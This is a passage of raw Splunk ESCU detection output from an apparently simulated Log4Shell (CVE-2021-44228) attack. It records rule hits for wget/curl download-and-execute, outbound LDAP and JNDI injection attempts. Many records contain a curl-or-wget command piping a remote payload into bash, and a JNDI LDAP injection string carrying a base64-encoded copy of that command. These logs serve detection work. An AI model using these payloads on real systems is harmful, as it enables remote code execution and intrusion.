This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642642716, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Exploitation", annotations._all="Source:Endpoint", annotations._all="Ingress Tool Transfer", annotations._all="Stage:Defense Evasion", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638101", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T00:21:41", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="8018", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", 
savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642642716, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Exploitation", annotations._all="Source:Endpoint", annotations._all="Ingress Tool Transfer", annotations._all="Stage:Defense Evasion", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633814", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:14", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7877", process_name="dash", risk_message="An instance of dash was identified on endpoint 
sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642642716, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Exploitation", annotations._all="Source:Endpoint", annotations._all="Ingress Tool Transfer", annotations._all="Stage:Defense Evasion", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633814", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:14", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl 
http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7877", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642642716, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Exploitation", annotations._all="Source:Endpoint", annotations._all="Ingress Tool Transfer", annotations._all="Stage:Defense Evasion", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633812", 
info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:12", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7870", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642642716, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Exploitation", annotations._all="Source:Endpoint", annotations._all="Ingress Tool Transfer", annotations._all="Stage:Defense Evasion", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", 
annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633812", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:12", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7870", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642642716, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Exploitation", annotations._all="Source:Endpoint", annotations._all="Ingress Tool Transfer", annotations._all="Stage:Defense Evasion", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress 
Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631700", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:35:00", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7798", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. 
This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642642716, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Exploitation", annotations._all="Source:Endpoint", annotations._all="Ingress Tool Transfer", annotations._all="Stage:Defense Evasion", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631700", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:35:00", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7798", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", 
savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642642453, search_name="ESCU - Detect Outbound LDAP Traffic - Rule", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Log4Shell CVE-2021-44228\"],\"cis20\":[\"CIS 12\",\"CIS 13\"],\"context\":[\"Source:Endpoint\",\"Stage:Initial Access\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Command and Control\",\"Actions on Objectives\"],\"mitre_attack\":[\"T1190\",\"T1059\"],\"nist\":[\"PR.DS\",\"PR.PT\",\"DE.AE\",\"DE.CM\"],\"observable\":[]}", annotations._all="PR.DS", annotations._all="T1059", annotations._all="DE.CM", annotations._all="DE.AE", annotations._all="Source:Endpoint", annotations._all="Actions on Objectives", annotations._all="CIS 13", annotations._all="Command and Control", annotations._all="CVE-2021-44228", annotations._all="T1190", annotations._all="CIS 12", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Stage:Initial Access", annotations._all="PR.PT", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.cis20="CIS 12", annotations.cis20="CIS 13", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Command and Control", annotations.kill_chain_phases="Actions on Objectives", annotations.mitre_attack="T1190", annotations.mitre_attack="T1059", annotations.nist="PR.DS", annotations.nist="PR.PT", 
annotations.nist="DE.AE", annotations.nist="DE.CM", dest_ip="0:0:0:0:0:ffff:a00:110", earliest_time="2022-01-19T22:34:59", info_max_time="+Infinity", info_min_time="0.000", latest_time="2022-01-20T00:21:41", risk_message="An outbound LDAP connection from 0:0:0:0:0:ffff:a00:114 in your infrastructure connecting to dest ip 0:0:0:0:0:ffff:a00:110", risk_object="0:0:0:0:0:ffff:a00:110", risk_object_type="system", risk_score="56.0", savedsearch_description="Malicious actors often abuse misconfigured LDAP servers or applications that use the LDAP servers in organizations. Outbound LDAP traffic should not be allowed outbound through your perimeter firewall. This search will help determine if you have any LDAP connections to IP addresses outside of private (RFC1918) address space.", src_ip="0:0:0:0:0:ffff:a00:114" 1642642451, search_name="ESCU - Log4Shell JNDI Payload Injection Attempt - Rule", action="Bad Request", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Log4Shell CVE-2021-44228\"],\"cis20\":[\"CIS 3\",\"CIS 5\",\"CIS 16\"],\"context\":[\"Source:Application Log\",\"Stage:Execution\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Reconnaissance\",\"Exploitation\"],\"mitre_attack\":[\"T1190\"],\"nist\":[\"DE.CM\"],\"observable\":[]}", annotations._all="CVE-2021-44228", annotations._all="CIS 5", annotations._all="CIS 16", annotations._all="Stage:Execution", annotations._all="DE.CM", annotations._all="Source:Application Log", annotations._all="CIS 3", annotations._all="T1190", annotations._all="Exploitation", annotations._all="Reconnaissance", annotations._all="Log4Shell CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.cis20="CIS 3", 
annotations.cis20="CIS 5", annotations.cis20="CIS 16", annotations.context="Source:Application Log", annotations.context="Stage:Execution", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Reconnaissance", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1190", annotations.nist="DE.CM", category="application/json", count="2", dest="10.0.1.21", dest_port="80", http_content_type="application/json", http_method="GET", http_referrer="unknown", http_user_agent="curl/7.79.1", info_max_time="+Infinity", info_min_time="0.000", risk_message="CVE-2021-44228 Log4Shell triggered for host 10.0.1.21", risk_object="10.0.1.21", risk_object_type="system", risk_score="15.0", savedsearch_description="CVE-2021-44228 Log4Shell payloads can be injected via various methods, but on of the most common vectors injection is via Web calls. Many of the vulnerable java web applications that are using log4j have a web component to them are specially targets of this injection, specifically projects like Apache Struts, Flink, Druid, and Solr. The exploit is triggered by a LDAP lookup function in the log4j package, its invocation is similar to `${jndi:ldap://PAYLOAD_INJECTED}`, when executed against vulnerable web applications the invocation can be seen in various part of web logs. Specifically it has been successfully exploited via headers like X-Forwarded-For, User-Agent, Referer, and X-Api-Version. In this detection we first limit the scope of our search to the Web Datamodel and use the `| from datamodel` function to benefit from schema accelerated searching capabilities, mainly because the second part of the detection is pretty heavy, it runs a regex across all _raw events that looks for `${jndi:ldap://` pattern across all potential web fields available to the raw data, like http headers for example. 
If you see results for this detection, it means that there was a attempt at a injection, which could be a reconnaissance activity or a valid expliotation attempt, but this does not exactly mean that the host was indeed successfully exploited.", site="localhost", src="${jndi:ldap://10.0.1.16:1389/Basic/Command/Base64/KGN1cmwgaHR0cDovLzguOC44Ljg6ODAvd3AtY29udGVudC90aGVtZXMvdHdlbnR5dGhpcnRlZW4vbTggfHwgd2dldCAtcU8gLSBodHRwOi8vOC44LjguODo4MC93cC1jb250ZW50L3RoZW1lcy90d2VudHl0aGlydGVlbi9tOCl8YmFzaA==}", url="http://10.0.1.21:80/", url_domain="10.0.1.21", user="unknown" 1642642453, search_name="ESCU - Detect Outbound LDAP Traffic - Rule", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Log4Shell CVE-2021-44228\"],\"cis20\":[\"CIS 12\",\"CIS 13\"],\"context\":[\"Source:Endpoint\",\"Stage:Initial Access\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Command and Control\",\"Actions on Objectives\"],\"mitre_attack\":[\"T1190\",\"T1059\"],\"nist\":[\"PR.DS\",\"PR.PT\",\"DE.AE\",\"DE.CM\"],\"observable\":[]}", annotations._all="PR.DS", annotations._all="T1059", annotations._all="DE.CM", annotations._all="DE.AE", annotations._all="Source:Endpoint", annotations._all="Actions on Objectives", annotations._all="CIS 13", annotations._all="Command and Control", annotations._all="CVE-2021-44228", annotations._all="T1190", annotations._all="CIS 12", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Stage:Initial Access", annotations._all="PR.PT", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.cis20="CIS 12", annotations.cis20="CIS 13", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.cve="CVE-2021-44228", 
annotations.kill_chain_phases="Command and Control", annotations.kill_chain_phases="Actions on Objectives", annotations.mitre_attack="T1190", annotations.mitre_attack="T1059", annotations.nist="PR.DS", annotations.nist="PR.PT", annotations.nist="DE.AE", annotations.nist="DE.CM", dest_ip="0:0:0:0:0:ffff:a00:110", earliest_time="2022-01-19T22:34:59", info_max_time="+Infinity", info_min_time="0.000", latest_time="2022-01-20T00:21:41", risk_message="An outbound LDAP connection from 0:0:0:0:0:ffff:a00:114 in your infrastructure connecting to dest ip 0:0:0:0:0:ffff:a00:110", risk_object="0:0:0:0:0:ffff:a00:114", risk_object_type="system", risk_score="56.0", savedsearch_description="Malicious actors often abuse misconfigured LDAP servers or applications that use the LDAP servers in organizations. Outbound LDAP traffic should not be allowed outbound through your perimeter firewall. This search will help determine if you have any LDAP connections to IP addresses outside of private (RFC1918) address space.", src_ip="0:0:0:0:0:ffff:a00:114" 1642642451, search_name="ESCU - Log4Shell JNDI Payload Injection Attempt - Rule", action="Bad Request", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Log4Shell CVE-2021-44228\"],\"cis20\":[\"CIS 3\",\"CIS 5\",\"CIS 16\"],\"context\":[\"Source:Application Log\",\"Stage:Execution\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Reconnaissance\",\"Exploitation\"],\"mitre_attack\":[\"T1190\"],\"nist\":[\"DE.CM\"],\"observable\":[]}", annotations._all="CVE-2021-44228", annotations._all="CIS 5", annotations._all="CIS 16", annotations._all="Stage:Execution", annotations._all="DE.CM", annotations._all="Source:Application Log", annotations._all="CIS 3", annotations._all="T1190", annotations._all="Exploitation", annotations._all="Reconnaissance", annotations._all="Log4Shell CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="context", 
annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.cis20="CIS 3", annotations.cis20="CIS 5", annotations.cis20="CIS 16", annotations.context="Source:Application Log", annotations.context="Stage:Execution", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Reconnaissance", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1190", annotations.nist="DE.CM", category="application/json", count="2", dest="10.0.1.21", dest_port="80", http_content_type="application/json", http_method="GET", http_referrer="unknown", http_user_agent="curl/7.79.1", info_max_time="+Infinity", info_min_time="0.000", risk_message="CVE-2021-44228 Log4Shell triggered for host 10.0.1.21", risk_object="unknown", risk_object_type="user", risk_score="15.0", savedsearch_description="CVE-2021-44228 Log4Shell payloads can be injected via various methods, but on of the most common vectors injection is via Web calls. Many of the vulnerable java web applications that are using log4j have a web component to them are specially targets of this injection, specifically projects like Apache Struts, Flink, Druid, and Solr. The exploit is triggered by a LDAP lookup function in the log4j package, its invocation is similar to `${jndi:ldap://PAYLOAD_INJECTED}`, when executed against vulnerable web applications the invocation can be seen in various part of web logs. Specifically it has been successfully exploited via headers like X-Forwarded-For, User-Agent, Referer, and X-Api-Version. 
In this detection we first limit the scope of our search to the Web Datamodel and use the `| from datamodel` function to benefit from schema accelerated searching capabilities, mainly because the second part of the detection is pretty heavy, it runs a regex across all _raw events that looks for `${jndi:ldap://` pattern across all potential web fields available to the raw data, like http headers for example. If you see results for this detection, it means that there was a attempt at a injection, which could be a reconnaissance activity or a valid expliotation attempt, but this does not exactly mean that the host was indeed successfully exploited.", site="localhost", src="${jndi:ldap://10.0.1.16:1389/Basic/Command/Base64/KGN1cmwgaHR0cDovLzguOC44Ljg6ODAvd3AtY29udGVudC90aGVtZXMvdHdlbnR5dGhpcnRlZW4vbTggfHwgd2dldCAtcU8gLSBodHRwOi8vOC44LjguODo4MC93cC1jb250ZW50L3RoZW1lcy90d2VudHl0aGlydGVlbi9tOCl8YmFzaA==}", url="http://10.0.1.21:80/", url_domain="10.0.1.21", user="unknown" 1642642416, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Exploitation", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", 
annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638231", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T00:23:51", parent_process_id="8018", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="8020", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642642416, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Exploitation", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", 
annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638231", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T00:23:51", parent_process_id="8018", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="8020", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. 
This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642642416, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Exploitation", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633944", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:24", parent_process_id="7877", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7879", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies 
